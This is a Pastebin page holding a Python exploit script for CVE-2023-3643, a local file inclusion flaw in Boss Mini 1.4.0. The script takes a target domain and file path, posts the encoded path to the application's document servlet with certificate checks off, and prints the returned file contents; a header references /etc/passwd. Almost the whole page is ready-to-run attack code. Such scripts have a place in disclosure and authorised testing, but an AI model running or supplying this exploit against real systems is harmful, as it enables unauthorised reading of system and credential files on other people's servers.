Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: Boss Mini 1.4.0 - local file inclusion
- # Date: 07/12/2023
- # Exploit Author: [nltt0] (https://github.com/nltt-br))
- # CVE: CVE-2023-3643
- '''
- _____ _ _____
- / __ \ | | / ___|
- | / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--.
- | | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
- | \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
- \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/
- __/ |
- |___/
- '''
- from requests import post
- from urllib.parse import quote
- from argparse import ArgumentParser
- try:
- parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
- parser.add_argument('--domain', required=True, help='Application domain')
- parser.add_argument('--file', required=True, help='Local file')
- args = parser.parse_args()
- host = args.domain
- file = args.file
- url = '{}/boss/servlet/document'.format(host)
- file2 = quote(file, safe='')
- headers = {
- 'Host': host,
- 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
- 'Content-Type': 'application/x-www-form-urlencoded',
- 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
- 'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
- }
- data = {
- 'path': file2
- }
- try:
- req = post(url, headers=headers, data=data, verify=False)
- if req.status_code == 200:
- print(req.text)
- except Exception as e:
- print('Error in {}'.format(e))
- except Exception as e:
- print('Error in {}'.format(e))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
